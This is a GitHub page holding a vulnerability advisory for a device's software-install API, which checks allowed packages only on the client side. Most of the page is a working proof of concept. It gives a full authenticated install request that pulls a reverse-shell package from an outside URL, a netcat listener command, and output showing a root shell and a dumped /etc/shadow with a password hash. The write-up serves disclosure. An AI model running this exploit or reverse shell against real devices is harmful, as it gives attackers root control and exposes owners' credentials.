Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
executable file 43 lines (35 sloc) 1.54 KB

Abuse of Functionality leads to RCE

Through the software installation feature, it is possible to install arbitrary software, such as a reverse shell, as the filter in the available package list is limited to client-side verification. It is possible to install software from filesystem, list (as by the application logic) and from URL. In the Proof of Concept, the basic reverse shell connect to 192.168.8.140 on port 8888. Connection can be received with a netcat listener on port 8888. Package is available for your tests.

Proof of Concept:

Request

POST /cgi-bin/api/software/install HTTP/1.1
Host: 192.168.8.1
Content-Length: 66
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Authorization: ce0fc001ff684088a83257360de4bb44
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.8.1
Referer: http://192.168.8.1/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: Admin-Token=ce0fc001ff684088a83257360de4bb44
Connection: close

name=http://onofri.org/storage/reverse_shell_1.0.0-1_mips_24kc.ipk

On the shell

% nc -l 8888
id
uid=0(root) gid=0(root)
cat /etc/shadow
root:$1$lchqx22V$LOxNwv3ggvnFw/kIyD2eB0:19256:0:99999:7:::
daemon:*:0:0:99999:7:::
ftp:*:0:0:99999:7:::
network:*:0:0:99999:7:::
nobody:*:0:0:99999:7:::
dnsmasq:x:0:0:99999:7:::
stubby:x:0:0:99999:7:::
pwd
/www/cgi-bin